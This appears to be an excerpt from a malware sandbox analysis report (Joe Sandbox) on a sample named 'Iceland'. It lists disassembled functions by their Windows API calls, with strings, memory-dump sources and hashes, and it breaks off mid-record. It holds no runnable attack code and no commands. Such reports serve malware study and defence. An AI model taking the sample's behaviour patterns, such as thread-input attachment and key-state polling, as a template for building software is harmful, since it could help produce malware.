                                                                                                                                                                                                                                                                • Instruction ID: 0111f848e87e91d07bb709cdfd41815ee107f74121f1c118197c276244f11c27
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf7cdb70430538dca758d9960cee052176dd52744d4b5de1da47b67318766052
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D41B6749047C96DFF31A76088043A5BEB06F31344F08816BD5C69A6C2FBA49DC8D7A3
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                • Opcode ID: 6eefda8e6d2ee01e84e2386eff9454e17e9816125f7e6c0808ba7d86fd40379e
                                                                                                                                                                                                                                                                • Instruction ID: 08af84d8fb63e05bde879fb5735b227176cc18779b78fa86390eab4b6b7954be
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eefda8e6d2ee01e84e2386eff9454e17e9816125f7e6c0808ba7d86fd40379e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A051C631A00516ABCF14DF6CCA509BFB7B5BF6A360B204229E826E72D4DB35DD40C790
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitialize.OLE32 ref: 00AA41D1
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00AA41DC
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00AC0B44,?), ref: 00AA4236
                                                                                                                                                                                                                                                                • IIDFromString.OLE32(?,?), ref: 00AA42A9
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AA4341
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AA4393
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                • Opcode ID: 04c71f41ef557bd9c8fec47f265d71b041874c3d725af9e6e3b1b20afdda51ca
                                                                                                                                                                                                                                                                • Instruction ID: dc50f23661541da33f5ce42787734d56ed00d5dddc67b6eb47f241026fabab64
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04c71f41ef557bd9c8fec47f265d71b041874c3d725af9e6e3b1b20afdda51ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E61A271608301EFD710DFA4D949FAABBE4EF8A714F100919F5859B291D7B0ED48CB92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00A98C9C
                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A98CAC
                                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A98CB8
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A98D55
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98D69
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98D9B
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A98DD1
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98DDA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                • Opcode ID: b4e345f8bd21d175d92648d3bc01be248d3f6f4e84ff6bc4e92fc1dc150c095c
                                                                                                                                                                                                                                                                • Instruction ID: 1022dece3672068ba7bb6e82fa898d90ec1eab1e2955a868e171c379343e8f55
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4e345f8bd21d175d92648d3bc01be248d3f6f4e84ff6bc4e92fc1dc150c095c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24616A76604305AFCB10EF64C94099EB3E8FF9A310F04492EF98987251EB39E945CB92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateMenu.USER32 ref: 00AB4715
                                                                                                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00AB4724
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AB47AC
                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 00AB47C0
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00AB47CA
                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AB47F7
                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 00AB47FF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                • String ID: 0$F
                                                                                                                                                                                                                                                                • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                • Opcode ID: 5f5436d8e4c22d85e4e0ef0f3e29a4dda44adb406ae9868debee5a333d1e8a1f
                                                                                                                                                                                                                                                                • Instruction ID: 58ebf6e1db0c7290aedad5a25d6389cdb90ec3635cf8318b8c6f779723c3409f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f5436d8e4c22d85e4e0ef0f3e29a4dda44adb406ae9868debee5a333d1e8a1f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50417779A0120AEFDB24DFA4D884EEA7BB9FF49314F144128FA45A7362D770A911CB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00A828B1
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32 ref: 00A828BC
                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00A828D8
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A828DB
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00A828E4
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00A828F8
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A828FB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                • Opcode ID: 9e683c4ce0a325d0544a45fdbacc2f8c951f0b0df6712d59015d3941b7d13a62
                                                                                                                                                                                                                                                                • Instruction ID: 15a137bf5774b85d3832c721e112392b7d1e580c1abe09a674ec73f69a961638
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e683c4ce0a325d0544a45fdbacc2f8c951f0b0df6712d59015d3941b7d13a62
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9921B074D00118BBCF04EBA4DC85EFEBBB4EF09350F004656B961A72A1EB355809DB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00A82990
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32 ref: 00A8299B
                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00A829B7
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A829BA
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00A829C3
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00A829D7
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A829DA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                • Opcode ID: c669f8c1ff7d346e5ad5b2a42eb35c49cf738d37e4808088e4905102902c2f91
                                                                                                                                                                                                                                                                • Instruction ID: 5af335021de7f61c7e0fd5678520629fe9116659fbfe825233a1b93799b27342
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c669f8c1ff7d346e5ad5b2a42eb35c49cf738d37e4808088e4905102902c2f91
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C21CD79900118BBCF14FBA4DC85EFEBBB8EF08340F004556F951A72A2EB759809DB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AB4539
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AB453C
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB4563
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AB4586
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AB45FE
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00AB4648
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00AB4663
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00AB467E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00AB4692
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00AB46AF
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                                                                                                                • Opcode ID: df59e4218e469a432fc8400ce7d5c069187ba8b20824e8ad546fa739e8b8ba38
                                                                                                                                                                                                                                                                • Instruction ID: c299d04f739e77a65fbe2a23333aff2c8d21280499b8d699d52c72ef7c519305
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df59e4218e469a432fc8400ce7d5c069187ba8b20824e8ad546fa739e8b8ba38
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5616B75A00208AFDB10DFA8CD91FEE77B8EF09710F104159FA14E72A2D774A956DB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A8BB18
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BB2C
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00A8BB33
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BB42
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A8BB54
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BB6D
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BB7F
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BBC4
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BBD9
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BBE4
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                • Opcode ID: 2b3d255b67a1ef75fa2b1b694e64492925a228e33a96335c89a655f1a1b2a4cb
                                                                                                                                                                                                                                                                • Instruction ID: a9179ed6f5801e218bf615ffe8671f3a09f3bd9aefa9e24e837a3e6724e6e4d8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b3d255b67a1ef75fa2b1b694e64492925a228e33a96335c89a655f1a1b2a4cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC319175924204AFDB10EBD4DC88FBA7BA9EB48352F104115FA05D71A4EB78A942CB34
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53007
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4), ref: 00A52D4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: GetLastError.KERNEL32(00AF1DC4,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4,00AF1DC4), ref: 00A52D60
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53013
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5301E
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53029
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53034
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5303F
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5304A
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53055
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53060
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5306E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: b7d82b437d866b8bb69f44de7a8959bbd9248396325b9c634ad71e89b6e52c15
                                                                                                                                                                                                                                                                • Instruction ID: 7d2d89ebb9963f920d916391a91d64bd4b102f3054328271b07764e74580452a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7d82b437d866b8bb69f44de7a8959bbd9248396325b9c634ad71e89b6e52c15
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E711B676100108BFCB11EF94DA42EDD3BB5FF16351B8144A5FE089F222DA31EE599B90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A22AF9
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(?,00000000), ref: 00A22B98
                                                                                                                                                                                                                                                                • UnregisterHotKey.USER32(?), ref: 00A22D7D
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00A63A1B
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00A63A80
                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A63AAD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                • String ID: close all
                                                                                                                                                                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                • Opcode ID: 9c08f3d8863a14e08361c116323a3c82678805f4f8e9d59603031bd28d25328e
                                                                                                                                                                                                                                                                • Instruction ID: f2db9ce8a36be6a8fe9f0d5d945bb096a07739e357610eea418b33983f692eda
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c08f3d8863a14e08361c116323a3c82678805f4f8e9d59603031bd28d25328e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AD16B327012229FCB29EF58DA95B69F7B0BF04750F1142ADE54A6B262DB31AD13DF40
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A989F2
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98A06
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00A98A30
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A98A4A
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98A5C
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98AA5
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A98AF5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                • Opcode ID: 117d86d073bafed9c10f3ab40a41038c148a41d244faeae522f33dd324455554
                                                                                                                                                                                                                                                                • Instruction ID: 362df11a3a32745ea6fcd4d12d3c242550ecc0329f9648fbfc3a0164fdc29137
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 117d86d073bafed9c10f3ab40a41038c148a41d244faeae522f33dd324455554
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C81B272A043019BCF24EF54C584ABEB3E8BF86350F54482EF485D7251DF38D9458B92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00A274D7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27567: GetClientRect.USER32(?,?), ref: 00A2758D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27567: GetWindowRect.USER32(?,?), ref: 00A275CE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27567: ScreenToClient.USER32(?,?), ref: 00A275F6
                                                                                                                                                                                                                                                                • GetDC.USER32 ref: 00A66083
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A66096
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00A660A4
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00A660B9
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00A660C1
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A66152
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                • Opcode ID: 9460fc47f541a0c473703e635df9d3bcbaeab0540fb0ba0ba7dd2a2cc9e1e38f
                                                                                                                                                                                                                                                                • Instruction ID: a05a0f080063c80f481ecc117739e954ea2536a11bb008b587ec05901d24c635
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9460fc47f541a0c473703e635df9d3bcbaeab0540fb0ba0ba7dd2a2cc9e1e38f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F71BC30500205EFCF25DFA8D984AFA7BB5FF49320F24827AED555B2A6C7318981DB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetCursorPos.USER32(?), ref: 00A219E1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: ScreenToClient.USER32(00000000,?), ref: 00A219FE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetAsyncKeyState.USER32(00000001), ref: 00A21A23
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetAsyncKeyState.USER32(00000002), ref: 00A21A3D
